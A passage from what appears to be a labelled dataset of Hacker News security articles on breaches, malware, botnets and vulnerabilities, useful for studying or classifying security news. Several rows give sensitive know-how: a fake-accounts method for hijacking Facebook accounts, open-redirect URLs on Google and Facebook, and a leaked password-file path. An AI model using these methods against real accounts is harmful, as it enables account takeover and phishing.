card information and merchants' financial and banking information were not affected by the hack, LivingSocial said. So it looks like some personal info may have fallen into the wrong hands, but credit card and other financial details should be safe. The cyberattack affected LivingSocial customers in North America, Australia, New Zealand, United Kingdom, Ireland and Malaysia and its LetsBonus users in Southern Europe and Latin America. So if you're among the affected users, the hackers have just the right amount of information to phish you. The site is sending out emails to customers advising them to change their passwords. ",Cyber_Attack Operation Ghost Click by FBI - Online advertising scam taken Down,https://thehackernews.com/2011/11/operation-ghost-click-by-fbi-online.html,"Operation Ghost Click by FBI - Online advertising scam taken Down A gang of internet 'cyber bandits' who stole $14 million after hacking into at least 4 million computers in an online advertising scam have been arrested following a joint investigation by the FBI and Nasa. Six men are in custody in Estonia, pending extradition to the United States, following a two-year investigation into an ""intricate international conspiracy"" that ""hijacked"" millions of computers around the world and stole more than US$14-million. The FBI's two-year investigation was dubbed ""Operation Ghost Click"". Computers in more than 100 countries were infected by the ""DNSChanger"" malware, which redirected searches for Apple's iTunes store to fake pages pretending to offer Apple software for sale, as well as sending those searching for information on the U.S. Internal Revenue Service to accounting company H&R Block, which allegedly paid those behind the scam a fee for each visitor via a fake internet ad agency. ""These defendants gave new meaning to the term 'false advertising',"" said Manhattan US Attorney Preet Bharara. ""As alleged, they were international cyber bandits who hijacked millions of computers at will and re-routed them to websites and advertisements of their own choosing, collecting millions in undeserved commissions for all the hijacked computer clicks and internet ads they fraudulently engineered."" Here's some screenshots from the FBI's ""Check to See if Your Computer is Using Rogue DNS"" instructions. Trend Micro, which helped supply information to the FBI on DNS Changer, hailed the law enforcement operation as the ""biggest cyber criminal takedown in history."" Whilst the rogue DNS servers have been replaced, many may still be infected. Head here to learn about how to check if your system is part of the DNS Changer botnet. ",Malware Skype privacy bug that can Send Messages To The Wrong Contacts,https://thehackernews.com/2012/07/skype-privacy-bug-that-can-send.html,"What if when you sent a message to someone, it had a very good chance of going to someone else in your contact list? That would be pretty scary right? That what some Skype users are reporting. The bug was first discussed in Skype's user forums, and seems to have followed a June 2012 update of the Skype software. Skype has confirmed the bug existence and that a fix is in the works. However, the company characterizes the bug as ""rare."" Purchased by Microsoft last year for $8.5 billion, the Luxemburg company which has as many as 40 million people using its service at a time during peak periods, explained that messages sent between two users were in limited cases being copied to a third party, but did not elaborate further on the matter. Five other individuals of the Microsoft-owned program confirmed they were also seeing instant messages being sent to the wrong person from their contact list. Sometimes it's just a few messages, while other times it's a whole conversation. Skype has, on its blog, confirmed the issue of a bug sending instant messages to wrong contacts and has promised a fix. Addressing the issue, Skype wrote, ""Based on recent Skype customer forum posts and our own investigation over the past couple of days, we have identified a bug that we are working hard to fix."" ",Vulnerability myOpenID XSS : One of the Largest OpenID provider is Vulnerable,https://thehackernews.com/2011/11/myopenid-xss-one-of-largest-openid.html,"myOpenID XSS : One of the Largest OpenID provider is Vulnerable One of the One of the Largest Independent OpenID provider ""myOpenID"" is Vulnerable to Cross Site Scripting (XSS) ,Discovered by ""SeeMe"" - Member of Inj3ct0r Team. Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. What Hacker can do - ""The attackers can steal the session ID of a valid user using XSS. The session ID is very valuable because it is the secret token that the user presents after login as proof of identity until logout. If the session ID is stored in a cookie, the attackers can write a script which will run on the user's browser, query the value in the cookie and send it to the attackers. The attackers can then use the valid session ID to browse the site without logging in. The script could also collect other information from the page, including the entire contents of the page"". Proof Of Concept - Click Here ",Vulnerability Phone Phreaking using Bluebox Demonstrated in India,https://thehackernews.com/2012/04/phone-phreaking-using-bluebox.html,"Phone Phreaking using Bluebox Demonstrated in India Christy Philip Mathew, an Indian Information Security Instructor and Hacker demonstrated Phone Phreaking using Bluebox in his lab. This time we have something really special that would remind us the phone phreaking. Actually Phone Phreaking reminds us about the life of Kevin Mitnick, Steve Wozniak and John Drapper, mean the olden times when they used to play around with the bluebox. What is Blue Box: This device is certainly one of the most unique pieces of electronic equipment that I have been able to collect so far. It is essentially a hacking tool disguised to look like a common 1970's Texas Instruments hand held electronic calculator. Basically a real calculator was sacrificed and modified to produce audio frequency signaling tones which allowed the user to freely (and illegally) access the Bell Telephone System long distance network. The origin of the name ""blue box"" was due to the fact the some of the earliest home built versions were actually housed in blue boxes. Below is a 1970's photo found on the web showing a happy phone phreak in action with such a device. That was just awesome and worked in the times of Mitnick. Christy Philip Mathew always used to explain these to his students but never got a chance to prove it. One day he was just checking up his bank accounts and he came across a deduction of some amount without any reason. So he thought to call up the customer care department to make sure what exactly is going around with his account. They said bla bla bla .... Hell out of excuses. So he used to call up the customer care department more than 3 to 4 times a day to know the status of my account deduction. Every time he had to verify his Customer Identification Number and the Mobile Number before he get connected to the Customer care department. This way, He had been repeating the steps the same time again and again. In simple terms tones gets generated every single time and he was completely tired with it. So he thought of having fun around and test up something what if he record the tones generated for his mobile number and customer identification number and play it when it ask him for. Yes, He is talking about the blue-box kind of Application via Android Phone with the help of it. So here he use ToneDef, is a small, but powerful tone dialer application featuring DTMF, bluebox, and redbox tone generation. Next day he dialed up the customer care and when they asked him to verify by dialing my mobile number he just played the recorded tones using an android application. Finally Customer Care system got it accepted that instant and now they ask him for Customer Identification Number, So again he played the second recorded tone respectively. On the very next day Christy Philip Mathew contacted me ( Mohit, Founder - The Hacker News ) and we decided to try this on a Public Booth to check the idea that weather we are able to call from Public booth without inserting the coin or not ? Sudden Christy plan to buy a coin operated phone terminal from eBay. It took around like 8 to 10 days to get his package. At last Christy demonstrate the Concept and Here below in the video you can see Proof of Concept: 1.) Coin Operated Phone Terminal 2.) Customer Care Department: 3.) Land Line Phone ",Vulnerability British Baptist Minister's son charged with hacking US Army and Nasa Computer Systems,https://thehackernews.com/2013/10/british-baptist-ministers-son-charged.html,"Son of a Baptist Minister, 28-year-old British man named Lauri Love has been charged with hacking into the computer systems of the US army, NASA and other federal agencies. He was arrested Friday at his home in Stradishall, England by the National Crime Agency and according to the indictment alleges Love and his unnamed co-conspirators hacked into thousands of computer systems between October 2012 and October 2013. The indictment does not accuse Love of selling information or doing anything else with it for financial gain. His father Alexander Love, 60, a Baptist minister, works as a chaplain at HMP Highpoint North. His mother Sirkka-Liisa Love, 59, also works at the jail as a teacher. He is charged with one count of accessing a U.S. Department or agency computer without authorization and one count of conspiracy. The government said the purpose was to disrupt the operations and infrastructure of the federal government. They stole data on more than 5,000 individuals, as well as information on government budgets and procurement processes. Love is alleged to have used the online monikers ""nsh"", ""route"", and ""peace"" to plot attacks from his home with three unnamed conspirators in Australia and Sweden and US authorities declined to discuss whether they had been arrested or will be arrested and extradited to the US. ""You have no idea how much we can fuck with the US government if we wanted to,"" Love told a hacking colleague in one exchange over Internet relay chat, prosecutors alleged. ""This... Stuff is really sensitive. It's basically every piece of information you'd need to do full identity theft on any employee or contractor"". Love could be extradited to the US, where if convicted he faces up to ten years in prison and a fine for twice the damage caused. Gary McKinnon's mother, Janis Sharp, accused US authorities of targeting young British geeks, said ""They are just young geeks sitting in their bedrooms; they're not murderers, they're not terrorists, they're not selling secrets, they're just searching for information,"". He has been released on bail until February and could face a maximum potential penalty of five years in prison and a $250,000 fine for each count. ",Cyber_Attack Over 1 Million Google Accounts Hacked by 'Gooligan' Android Malware,https://thehackernews.com/2016/11/hack-google-account.html,"If you own an Android smartphone, Beware! A new Android malware that has already breached more than 1 Million Google accounts is infecting around 13,000 devices every day. Dubbed Gooligan, the malware roots vulnerable Android devices to steal email addresses and authentication tokens stored on them. With this information in hands, the attackers are able to hijack your Google account and access your sensitive information from Google apps including Gmail, Google Photos, Google Docs, Google Play, Google Drive, and G Suite. Researchers found traces of Gooligan code in dozens of legitimate-looking Android apps on 3rd-party app stores, which if downloaded and installed by an Android user, malware starts sending your device's information and stolen data to its Command and Control (C&C) server. ""Gooligan then downloads a rootkit from the C&C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT (CVE-2013-6282) and Towelroot (CVE-2014-3153),"" researchers said in a blog post. ""If rooting is successful, the attacker has full control of the device and can execute privileged commands remotely."" According to CheckPoint security researchers, who uncovered the malware, anyone running an older version of the Android operating system, including Android 4.x (Jelly Bean, KitKat) and 5.x, (Lollipop) is most at risk, which represents nearly 74% of Android devices in use today. ""These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user,"" researchers added. Once hack into any Android device, Gooligan also generates revenues for the cyber criminals by fraudulently buying and installing apps from Google Play Store and rating them and writing reviews on behalf of the phone's owner. The malware also installs adware to generate revenue. How to check if your Google account has been compromised with this malware? Check Point has published an online tool to check if your Android device has been infected with the Gooligan malware. Just open 'Gooligan Checker' and enter your Google email address to find out if you've been hacked. If you found yourself infected, Adrian Ludwig, Google's director of Android security, has recommended you to run a clean installation of the operating system on your Android device. This process is called 'Flashing,' which is quite a complicated process. So, the company recommends you to power off your device and approach a certified technician or your mobile service provider in order to re-flash your device. ",Malware "New Cryptojacking Malware Targeting Apache, Oracle, Redis Servers",https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html,"A financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of their malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research. Deployed by the China-based cybercrime group Rocke, the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers said in a Thursday write-up. ""Pro-Ocean uses known vulnerabilities to target cloud applications,"" the researchers detailed. ""In our analysis, we found Pro-Ocean targeting Apache ActiveMQ (CVE-2016-3088), Oracle WebLogic (CVE-2017-10271) and Redis (unsecure instances)."" ""Once installed, the malware kills any process that uses the CPU heavily, so that it's able to use 100% of the CPU and mine Monero efficiently."" First documented by Cisco Talos in 2018, Rocke has been found to distribute and execute crypto-mining malware using a varied toolkit that includes Git repositories and different payloads such as shell scripts, JavaScript backdoors, as well as portable executable files. While prior variants of the malware banked on the capability to target and remove cloud security products developed by Tencent Cloud and Alibaba Cloud by exploiting flaws in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion, Pro-Ocean has expanded the breadth of those attack vectors by aiming at Apache ActiveMQ, Oracle WebLogic, and Redis servers. Besides its self-spreading features and better hiding techniques that allow it to stay under the radar and spread to unpatched software on the network, the malware, once installed sets about uninstalling monitoring agents to dodge detection and removing other malware and miners from the infected systems. To achieve this, it takes advantage of a native Linux feature called LD_PRELOAD to mask its malicious activity, a library named Libprocesshider to stay hidden, and uses a Python infection script that takes the machine's public IP to infect all machines in the same 16-bit subnetwork (e.g., 10.0.X.X). Pro-Ocean also works to eliminate competition by killing other malware and miners, including Luoxk, BillGates, XMRig, and Hashfish, running on the compromised host. In addition, it comes with a watchdog module written in Bash that ensures persistence and takes care of terminating all processes that utilize more than 30% of the CPU with the goal of mining Monero efficiently. ""This malware is an example that demonstrates that cloud providers' agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,"" Unit 42 researcher Aviv Sasson said. ""This sample has the capability to delete some cloud providers' agents and evade their detection."" ",Malware Widespread Instagram Hack Locking Users Out of Their Accounts,https://thehackernews.com/2018/08/hack-instagram-accounts.html,"Instagram has been hit by a widespread hacking campaign that appears to stem from Russia and have affected hundreds of users over the past week, leaving them locked out of their accounts. A growing number of Instagram users are taking to social media, including Twitter and Reddit, to report a mysterious hack which involves locking them out of their account with their email addresses changed to .ru domains. According to victims, their account names, profile pictures, passwords, email addresses associated with their Instagram accounts, and even connected Facebook accounts are being changed in the attack. Many of the affected Instagram users are also complaining about their profile photos replaced with stills from popular films, including Despicable Me 3 and Pirates of the Caribbean. Although it is still unknown who is behind the widespread hack of Instagram accounts, the use of the email addresses originating from Russian email provider mail.ru may indicate a Russian hacker or hacking group is behind the attack, or perhaps hackers pretending to be from Russia. First spotted by Mashable, the hack even affected Instagram users with two-factor authentication (2FA) enabled, as at least one user told Mashable that he was using 2FA, but it did nothing to stop his account from being hacked. However, it is currently unconfirmed. In response to the report, Instagram published a blog post saying that the company continues to investigate the issue and that it has ""dedicated teams helping people to secure their accounts."" ""We are aware that some people are having difficulty accessing their Instagram accounts,"" Instagram says, pointing users to its guidance on hacked accounts to help keep their account secure. The company advises Instagram users to keep a secure password with at least six numbers and/or letters, enable 2FA for additional security, and to revoke any suspicious third-party app that might have access to their accounts. Instagram currently relies on text messages for two-factor authentication, which is believed to be less secure than other app-based 2FA methods, but the Facebook-owned company says it is working on improving its 2FA settings. However, since the unknown technique being used by attackers to hack Instagram accounts is still unaddressed, there's nothing much you can do if the suspected loophole can also bypass two-factor authentication. The motive behind the attacks is still unknown, but it appears that the attacks on Instagram are still happening at the time of writing. For more information, users are recommended to visit the Instagram Help Centre dedicated to hacked accounts, which includes security tips as well as steps they can take to restore their account. ",Vulnerability Hacking Smart Electricity Meters To Cut Power Bills,https://thehackernews.com/2014/10/hacking-smart-electricity-meters-to-cut.html,"Smart devices are growing at an exponential pace with the increase in connecting devices embedded in cars, retail systems, refrigerators, televisions and countless other things people use in their everyday life, but security and privacy are the key issues for such applications, which still face some enormous number of challenges. Millions of Network-connected electricity meters or Smart meters used in Spain are susceptible to cyberattack by hackers due to lack of basic and essential security controls that could put Millions of homes at risk, according to studies carried out by a pair of security researcher. HACKERS TO CAUSE BLACKOUT AND BILL FRAUD The security vulnerabilities found in the electricity meters could allow an intruder to carry out billing fraud or even shut down electric power to homes and cause blackouts. Poorly protected credentials inside the devices could let attackers take control over the gadgets, warn the researchers. The utility that deployed the meters is now improving the devices' security to help protect its network. During an interview on Monday, the security researchers, Javier Vazquez Vidal and Alberto Garcia Illera, said the vulnerability affects smart meters installed by a Spanish utility company, the one on which the Spanish government relied in order to improve national energy efficiency. The research carried out by the duo researchers will soon be presented at Black Hat Europe hacking conference in Amsterdam next week. The duo will explain on how they reverse engineered smart meters and found blatant security weaknesses that allowed them to commandeer the devices to shut down power or perform electricity usage fraud over the power line communications network. SMART METER'S REPROGRAMMABLE MEMORY RUNS FLAWED CODE The Vulnerability resides in the memory chips of the smart meters, which are reprogrammable and contain flawed code that could be exploited to remotely shut down power supplies to individual households, tamper meter readings, transfer meter readings to other customers and insert ""network worms"" that could leave millions of homes without power causing widespread blackouts. Though the researchers will not provide any detail explanation on what they actually did, until the problems are fixed by the Smart meter vendor. ""We are not releasing the exact details; we are not going to say how we did this,"" Garcia Illera, a security expert involved in the smart meter research, told Reuters. ""This issue has to be fixed."" WEAK ENCRYPTION USED According to the two researchers, the Smart meters use relatively easy to crack symmetric AES-128 encryption, which was designed to secure communications and prevent tampering with billing systems by fraudsters. There are three major utility companies in Spain — Endesa, Iberdrola and E.ON and collectively 8 million Smart meters have been installed on over 30 percent of households. However, the two haven't yet disclosed the specific smart meter manufacturer at this time. The duo said they could take full control of the meter box, switch its unique ID to impersonate other customer boxes or turn the meter itself into a weapon for launching attacks against the power network. ""Oh wait? We can do this? We were really scared,"" said Vazquez Vidal, another security expert involved in the smart meter research. ""We started thinking about the impact this could have. What happens if someone wants to attack an entire country?"" he said. Internet of Things (IoTs) promise to make life easier in countless ways, but as with any technology seeing an upswing, it's to be expected that there will be associated security issues and challenges and this was what happened with the Smart meters in Spain. ",Vulnerability Crash Your Friends' WhatsApp Remotely with Just a Message,https://thehackernews.com/2014/12/crash-your-friends-whatsapp-remotely_1.html,"A Vulnerability has been discovered in the wildly popular messaging app WhatsApp, which allows anyone to remotely crash WhatsApp just by sending a specially crafted message, two security researchers reported 'The Hacker News'. Two India based independent security researchers, Indrajeet Bhuyan and Saurav Kar, both 17-year old teenagers demonstrated the WhatsApp Message Handler vulnerability to one of our security analyst. In a video demonstration, they showed that how a 2000 words (2kb in size) message in special character set can crash Whatsapp messenger app. Previous it was discovered that sending a huge message ( greater than 7mb in size) on Whatsapp could crash victim device and app immediately, but using this new exploit attacker only need to send a very small size (approx 2kb) message to the victim. The worried impact of the vulnerability is that the user who received the specially crafted message will have to delete his/her whole conversation and start a fresh chat, because opening the message keeps on crashing WhatsApp unless the chat is deleted completely. ""What makes it more serious is that one needs to delete entire chat with the person they are chatting to in order to get back whatsapp work in normal,"" Bhuyan told THN in an e-mail. According to the duo, the reported vulnerability has been tested and successfully works on most of the versions of Android Operating system including Jellybean, Kitkat, and all the below android versions. Similarly, Any member of your WhatsApp group could intentionally send a specially crafted message to exit people from the group and delete the group. Also, for example, if I don't want someone to keep records of my chat with them, then I can also send the same message exploit to the person. The vulnerability has not been tested on iOS, but it is sure that all versions of WhatsApp including 2.11.431 and 2.11.432 are affected with this bug. Also the attack does not work on Windows 8.1. They have also provided the Proof-of-Concept (PoC) video for the attack, users can watch above. WhatsApp, bought by Facebook for $19 billion in February this year, has 600 Million users as of October 2014, and according to the researchers, an estimated number of users affected by the vulnerability could be 500 Million. WhatsApp was in news recently for making end-to-end encryption on all text messages as a default feature in an effort to boost the online privacy and security of its users around the world. The app maker describe this move as the ""largest deployment of end-to-end encryption ever."" ",Vulnerability "Rakabulle, Advance File Binder from DarkComet RAT Developer",https://thehackernews.com/2014/01/rakabulle-advance-file-binder-from.html,"I hope you all still remember the famous and powerful Remote Administration Tool (RAT) called 'Dark Comet', developed by a French computer geek 'Jean-Pierre Lesueur', also known as 'DarkCoderSc'. However, He had closed the Dark Comet project, when the Syrian government found to be using it to track down and to spy on their people. After that DarkCoderSc started working under a new banner 'Phrozen Software' to develop many new security softwares and penetration testing tools. Just yesterday, Jean-Pierre and his team-mate Fabio Pinto from French University, have released a new tool called 'Rakabulle', a file binder with some cool features for penetration testers and malware researchers. File binder is an application that allows a user to bind multiple files together, resulting in a single executable file. When you execute that single application, all previous merged files will be extracted to a temporary location, and will be executed normally. ""The builder Rakabulle application will create a stub and inject in its resource the target files to extract and execute. The stub is the little generate part of the program which is designed to extract from its resource the target files to a temporary location and execute. In our application the stub also got a part to inject in Explorer or Internet Explorer process and load custom made plugins. Video Demo: Listed features are: File binder, auto file extractor and executor. REM (Remote Code Execution), Execute code (Plugins) in target process (Explorer or Internet Explorer) Support 32 and 64 Process. The application is a 32bit Application (Soon we will compile the 64bit version) Support UPX compression for the stub (Without compression stub size is about 38KiB using pure Windows API no extra libraries; with compression stub size is approximately 16KiB) The UPX compression doesn't change the way the application work only the final size. Support Windows startup. Doesn't require administrative privileges. Plugins and File list support drag and drop. Support plugins with an open source example. The stub and the builder are coded using Unicode encoding. The file binder application is available for Free to download from Rakabulle website. ",Malware Fake WeChat App Targeting Android Users with Banking Trojan,https://thehackernews.com/2014/05/fake-wechat-app-targeting-android-users.html,"After Whatsapp, The Chinese WeChat is the second most popular messaging application and currently being targeted by cybercriminals to spread a new Banking Trojan in order to steal the financial information from its users. WeChat is a famous mobile instant messaging app developed by Chinese company Tencent, with more than 355 million users across the world. The app offers people to chit-chat with their friends and relatives, and also allows users to make payments for goods and services on WeChat. The Payment feature of the app requires users' bank account details to their messenger account and this is what tempting cybercriminals to develop new and more sophisticated banking Trojans and malwares. The security researchers at Kaspersky Lab have uncovered such banking Trojan, dubbed as Banker.AndroidOS.Basti.a, which looks exactly like the legitimate WeChat application for Android devices. While installation, it also requires the same permissions such as to access the Internet, received SMSs, and other services just like the real Wechat app. Researchers found that some modules of the malware app are encrypted and this feature makes it different and sophisticated from other Mobile banking malwares. The malware authors have used an effective encryption in order to prevent Banker.AndroidOS.Basti.a trojan from reverse engineering of the code. However, the Kaspersky researchers have successfully managed to decode the threat module and found that the malware is capable to perform various types of malicious tasks, including its more professional GUI, which makes it an efficient phishing tool. Once the malicious WeChat app installed on the victims' android devices, they are served a page asking to enter some useful information including their phone numbers, payment card numbers, PINs and other financial data. As soon as a victim provides the personal details to the fake app, it sends them back to an email account controlled by the malware author. ""This Trojan-Banker also registered a BootReceiver. It will monitor newly received text messages and uninstall broadcasts from the infected mobile."" they noticed. The email account name and password details are hard-coded in the source code of the trojan and researchers have successfully retrieved it. They logged into the attackers email account and found that the banking trojan has already made lots of victims. As the online apps are becoming more popular among the people, hence becoming an easy and a tempting target for cyber thieves. So, its up to you to better safeguard your data privacy. Make sure that you have installed a reputed mobile security software in your devices. Always update your software applications to the latest version and avoid providing your sensitive information to any suspicious websites or downloading any app from any untrusted source. ",Malware Android Privilege Escalation Flaws leave Billions of Devices vulnerable to Malware Infection,https://thehackernews.com/2014/03/android-privilege-escalation-flaws.html,"Android - a widely used Smartphone platform offered by Google is once again suspected to affect its users with malicious software that puts their android devices at risk. This time the vulnerabilities occur in the way Android handle the updates to add new flavors to your device. Researchers from Indiana University and Microsoft have discovered [Paper PDF] a new set of Android vulnerabilities that is capable to carry out privilege escalation attacks because of the weakness in its Package Management Service (PMS) that puts more than one billion Android devices at risk. The researchers dubbed the new set of security-critical vulnerabilities as Pileup flaws which is a short for privilege escalation through updating, that waylays inside the Android PMS and intensifies the permissions offered to malicious apps whenever an android update occurs, without informing users. The research was carried out by Indiana University Bloomington researchers, Luyi Xing, Xiaorui Pan, Kan Yuan and XiaoFeng Wang, with the help of Rui Wang of Microsoft. Six different Pileup vulnerabilities have been found by the researchers within the Android PMS, those are present in all Android Open Source Project versions, including more than 3,500 customized versions of Android developed by handset makers and carriers. ""Every few months, an update is released, which causes replacement and addition of tens of thousands of files on a live system. Each of the new apps being installed needs to be carefully configured to set its attributes within its own sandboxes and its privileges in the system, without accidentally damaging existing apps and the user data they keep,"" the researchers wrote. ""This complicates the program logic for installing such mobile updates, making it susceptible to security-critical flaws."" The researchers also found that by exploiting the Pileup vulnerabilities, a hacker can not only control the system permission and signature but also their settings. Moreover an attacker could use the malicious app to access and steal the device data, including, sensitive user information such as activity logs, user credentials, Contacts, Messages etc. ""A distinctive and interesting feature of such an attack is that it is not aimed at a vulnerability in the current system. Instead, it exploits the flaws in the updating mechanism of the ""future"" OS, which the current system will be upgraded to,"" the researchers wrote. ""More specifically, though the app running on a lower version Android, the adversary can strategically claim a set of carefully selected privileges or attributes only available on the higher OS version."" In short, it means that, if an attacker sends the malicious app update and if the permission don't exist in the older version of the android that is added to the new version; the malicious app will silently acquire the permissions and when the device is upgraded to the newer version, the pileup flaws will be automatically exploited. ""A third-party package attribute or property, which bears the name of its system counterpart, can be elevated to a system one during the updating shuffle-up where all apps are installed or reinstalled, and all system configurations are reset,"" the researcher wrote. ""Also, when two apps from old and new systems are merged as described above, security risks can also be brought in when the one on the original system turns out to be malicious."" During the update, first the PMS will install all new and existing system apps and then will proceed to install third party apps from the old OS and during the installation of malicious app packed inside PMS, the device will recognize and silently grants all the permissions that malicious app requests, as it supposes that these permissions are with an existing app and have already been approved by the user. ""With the help of a program analyzer, our research discovered 6 such Pileup flaws within Android Package Manager Service and further confirmed their presence in all AOSP (Android Open Source Project) versions and all 3,522 source code versions customized by Samsung, LG and HTC across the world that we inspected, which strongly indicates their existence in all Android devices in the market."" Moreover detecting the critical flaws, the researchers have developed a new scanner app called SecUP that search for malicious apps already on a device designed to exploit Pileup vulnerabilities. Scanning tool inspects already installed Android application packages (APKs) on the device, in an attempt to identify those that will cause privilege escalations during an update, the paper stated. The SecUP scanning tool consists of an automated vulnerability detector, a program verification tool for Java that discovers the Pileup flaws within the source code of different Android versions and a threat analyzer that automatically scans thousands of OS images. ""The detector verifies the source code of PMS (from different Android versions) to identify any violation of a set of security constraints, in which we expect that the attributes, properties (name, permission, UID, etc.) and data of a third-party app will not affect the installation and configurations of system apps during an update,"" the researchers explained. ""A Pileup flaw is detected once any of those constraints are breached."" All the six vulnerabilities have been reported to Google by the researchers, from which one of it has been fixed by them. ",Vulnerability URL redirection Vulnerability in Google & Facebook,https://thehackernews.com/2012/01/url-redirection-vulnerability-in-google.html,"URL redirection Vulnerability in Google An open redirect is a vulnerability that exists when a script allows redirectionto an external site by directly calling a specific URL in an unfiltered,unmanaged fashion, which could be used to redirect victims to unintended,malicious web sites. A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. A similar vulnerability is reported in Google by ""Ucha Gobejishvili ( longrifle0x )"". This problem may assist an attacker to conduct phishing attacks, trojan distribution, spammers. Url: https://accounts.google.com/o/oauth2/auth?redirect_uri=https://www.something.com Same vulnerability in Facebook, Discovered by ZeRtOx from Devitel group: https://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&u=www.something.com Impact of Vulnerability : The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine. This will expose the user to extensive risk and the user's interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data. The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user's credentials and then use these credentials to access the legitimate web site. ",Malware "Facebook ""Trusted friends"" Security Feature Easily Exploitable",https://thehackernews.com/2011/10/facebook-trusted-friends-security.html,"Facebook ""Trusted friends"" Security Feature Easily Exploitable Last week Facebook announced that in one day 600,000 accounts possibly get hacked. Another possible solution for Facebook to combat security issues is to find 3 to 5 ""Trusted friends"". Facebook will be adding two new security features that will allow users to regain control of their account if it gets hijacked. In Facebook's case, the keys are codes, and the user can choose from three to five ""Trusted friends"" who are then provided with a code. If you ever get locked out of your account (and you can't access your email to follow the link after resetting your Facebook password), you gather all the codes and use them to gain access to it again. Yet This method is used by hackers to hack most of the Facebook account using little bit of Social Engineering from last 5-6 Months according to me. Let us know, how this works... How its Exploitable: This Exploit is 90% Successful on the victims who add friends without knowing them or just for increasing the number of Friends. This method to hack a Facebook Account only works if 3 trusted friends agree to give you the security code ! Another Idea, Why not Create 3 fake accounts and send Friend Request to Victim. Once your 3 Fake Accounts become friends with your victims facebook account, you can select those 3 Accounts to get the Security Code and Reset the password of Victim. Here a Complete Demonstration of Hacking Method on HackersOnlineClub. Other Serious Facebook Vulnerability in Last Week Last Week Nathan Power from SecurityPentest has discovered new Facebook Vulnerability, that can easily attach EXE files in messages,cause possible User Credentials to be Compromised . Not even Account Security, Also there are lots of Privacy Issues in Facebook,like Nelson Novaes Neto, a Brazilian (independent) Security and Behavior Research have analyze a privacy issue in Facebook Ticker that allows any person chasing you without your knowledge or consent . Facebook should takes these privacy issues & security holes very seriously. ",Vulnerability Aldi Bot - Buy a Botnet just in 10 Euros,https://thehackernews.com/2011/09/aldi-bot-buy-botnet-just-in-10-euros.html,"Aldi Bot - Buy a Botnet just in 10 Euros Researchers of German security firm G Data have discovered that a bot builder dubbed ""Aldi Bot"" is currently being offered for that much on underground forums. The Aldi Bot Builder appears to be based on the ZeuS source code. The malware has nothing to do with the discount supermarket chain and it is not clear why its author chose to name the bot after Aldi – it is thought it may relate to the bot's discount pricing. Company says ""We've encountered a bot sale, which, in case it finds followers, can cause a massive glut of malware all over. The so-called ""Aldi Bot"" first appeared in late August and has been sold for the initial price of €10! Parts of the bot's code oddly look like ZeuS code…"" The Aldi Bot can read (saved) passwords from the Firefox web browser, Pidgin IM client and JDownloader download tool, and send them to a command and control server which is included in the €10 price tag. The Aldi Bot can also carry out Distributed Denial-of-Service (DDoS) attacks, as the bot's author demonstrates with a YouTube video showing an attack on the German Bundeskriminalamt (equivalent to the UK CID) web site. The bot can also be set up as a SOCKS proxy to use infected computers as proxies for protocols of the bot herder's choosing. Infecting systems with the discount malware does, however, require additional measures, such as exploit packs on infected web sites. ",Malware Ransomware Attack Takes Down Bristol Airport's Flight Display Screens,https://thehackernews.com/2018/09/cyberattack-bristol-airport.html,"Bristol Airport has blamed a ransomware attack for causing a blackout of flight information screens for two days over the weekend. The airport said that the attack started Friday morning, taking out several computers over the airport network, including its in-house display screens which provide details about the arrival and departure information of flights. The attack forced the airport officials to take down its systems and use whiteboards and paper posters to announce check-in and arrival information for flights going through the airport and luggage pickup points for all Friday, Saturday, and the subsequent night. ""We are currently experiencing technical problems with our flight information screens,"" a post on the Bristol Airport's official Twitter feed read on Friday. ""Flights are unaffected and details of check-in desks, boarding gates, and arrival/departure times will be made over the public address system. Additional staff are on hand to assist passengers."" The airport also urged passengers to arrive early and ""allow extra time for check-in and boarding processes,"" though this two days technical meltdown caused delays in baggage handling, with customers needed to wait longer than one hour for their bags. However, no flight delays were reportedly caused due to the cyber attack. An airport spokesman said that the information screens went offline due to a so-called ""ransomware"" attack, though he confirmed that no ""ransom"" had been paid to get the airport systems working again. Affected systems and flight information screens were finally restored on Sunday, officials said. ""We are grateful to passengers for their patience while we have been working to resolve issues with flight information this weekend. Digital screens are now live in arrivals and departures. Work will continue to restore complete site-wide coverage as soon as possible,"" the airport tweeted on Sunday. At the moment, it is not clear how the ransomware got into the airport systems. Bristol is carrying out an investigation to find out what happened. ",Cyber_Attack Server Misconfiguration discloses passwords of all Barracuda Network Employees,https://thehackernews.com/2013/07/Barracuda-network-Password-disclosure-vulnerability_24.html,"Security expert Ebrahim Hegazy has found a Password disclosure vulnerability in Barracuda update servers which allows to gain access to employee credentials. The Egyptian information security advisor Ebrahim Hegazy(@Zigoo0) has found a Password disclosure vulnerability in one of Barracuda update servers which allows the attackers to gain access to all its employee data. When the system administrator needs to protect a directory with a second authentication layer (basic authentication) besides the back-end authentication, he can do it with multiple methods, one of that methods is through the configuration of .htaccess and .htpasswd files. A proper configuration could prevent a visitor to surf reserved area (e.g /Cpanel or /admin), in this scenario a popup proposes to the user asking to enter authentication credentials, that credentials are saved inside .htpasswd file as: Username:Password In normal scenarios the .htpasswd file should be stored outside the web directory (e.g. C:\AnyName\.htpasswd) But in Barracuda issue the file was stored inside the admin panel directory and was accessible by anyone with serious repercussion. If the user directly accesses the following link https://updates.cudasvc.com/admin/.htpasswd ,he will be able to disclose the passwords of all Barracuda Network Employees such as: Support, Sales, UK Branch employees, Update server users, Engineers and more of those who have access to the basic authentication layer! The Password disclosure vulnerability is exacerbated by the fact that the passwords were saved as a clear text, following the screenshots before the vulnerability got patched The vulnerability has been reported by Ebrahim Hegazy to Barracuda, that already fixed it, despite it is not eligible for the bounty. Curious 